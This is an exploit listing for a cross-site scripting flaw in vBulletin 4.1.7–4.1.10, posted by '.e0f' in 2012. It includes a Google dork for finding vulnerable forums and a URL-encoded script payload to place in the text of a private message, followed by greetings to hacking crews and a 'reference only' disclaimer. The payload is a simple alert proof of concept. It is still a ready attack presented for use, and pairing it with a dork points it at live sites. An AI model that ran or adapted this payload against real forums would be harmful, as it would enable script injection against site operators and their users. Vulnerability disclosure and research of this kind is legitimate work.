vBulletin 4.1.7 => 4.1.10 XSS Vulnerability



EKU-ID: 1764 CVE: OSVDB-ID:
Author: .e0f Published: 2012-03-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: vBulletin 4.1.7 => 4.1.10 XSS Vulnerability
# Google Dork: intitle: powered by vBulletin 4.1.10
# Date: 20/02/2012
# Author: .e0f
# Software Link: [http://www.vbulletin.com/]
# Version: [4.1.10 Others not tested]
# Tested on: [BackTrack 5 | BlackBuntu | Windows 7/xp]
# Contact: [https://twitter.com/#!/e0fx]
# Home: [http://brutezone.ru]
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
# Video: [http://vimeo.com/39049790]
######################################################################################################
Vulnerability:
1.
Send New Private Message >
                         >
   Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)
######################################################################################################

Watch the video: [http://vimeo.com/39049790]

##########################################################################################
                       4ll 1nformati0n is pr0vid3d f0r ref3rence 0nly!
##########################################################################################
Greetz to: Babka | F1xeR | ga1Do4ok | Dark-x | Moderor | 2FED | 4elovek
  v1nest | .e0f | ka0z | silver | Saint | x0r | Duman | ugly | Shadow008 | AlphaSky
   * special thanks to: fpteam-cheats.com | brutezone.ru | From Russia with Love....
###########################################################################################